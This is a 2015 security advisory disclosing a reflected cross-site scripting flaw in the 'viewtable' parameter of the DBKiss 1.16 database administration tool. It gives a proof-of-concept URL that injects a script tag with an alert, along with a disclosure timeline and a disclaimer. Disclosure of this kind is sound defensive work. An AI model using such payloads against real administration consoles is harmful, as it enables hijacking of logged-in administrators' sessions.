Affected Vendor:
https://code.google.com/p/dbkiss/

Credits: John Page ( hyp3rlinx )
Domains:  hyp3rlinx.altervista.org

Source:
http://hyp3rlinx.altervista.org/advisories/AS-DBKISS0513.txt


Product:
DBKiss Database administration tool for MySQL, PostgreSQL and SQLite.


Advisory Information:
=====================================================
DBKiss 1.16 is vulnerable to XSS attacks.
Tested successfully in Firefox.


Exploit code:
==============

http://localhost/dbkiss_1.16/dbkiss.php?viewtable=%27%3Cscript%3Ealert%28%22XSS%20By%20Hyp3rlinx\n05112015%22%29%3C/script%3E//

Disclosure Timeline:
==================================

Vendor Notification  NA
May 13, 2015: Public Disclosure


Severity Level:
===============
High


Description:
============

Request Method(s):
                                [+] GET

Vulnerable Product:
                                [+] DBKiss 1.16

Vulnerable Parameter(s):
                                [+] viewtable=[XSS]

Affected Area(s):
                                [+] Admin console of currently logged in user.

==============================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.


(hyp3rlinx)